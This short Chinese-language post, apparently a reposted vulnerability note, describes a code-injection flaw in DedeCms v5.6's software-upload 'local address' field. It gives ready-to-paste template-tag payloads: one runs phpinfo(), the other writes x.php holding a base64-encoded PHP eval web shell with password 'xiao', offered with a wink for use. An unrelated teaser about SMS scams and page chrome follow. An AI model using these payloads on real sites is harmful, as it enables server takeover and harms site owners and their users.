在上传软件的地方,对本地地址没有进行有效的验证,可以被恶意利用。
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行。
a{/dede:link}{dede:toby57 name="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
生成:x.php,密码:xiao,直接生成一句话。密码:xiao,大家懂得。
文章来源于lcx.cc:DedeCms v5.6 - 嵌入恶意代码执行漏洞
XX集团举行三十周年大庆典,您的手机号码获得了20万大奖。 爸我在外嫖娼被抓手机被没收,快汇5万保释费到XX。 相信用过手机的人都收到过类似的短信,你有没有这样的疑问:这些已经被媒体曝光成千上万次骗术为什么还是一再出现?骗子们看上去实在太不好学了,怎么也不开拓…
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论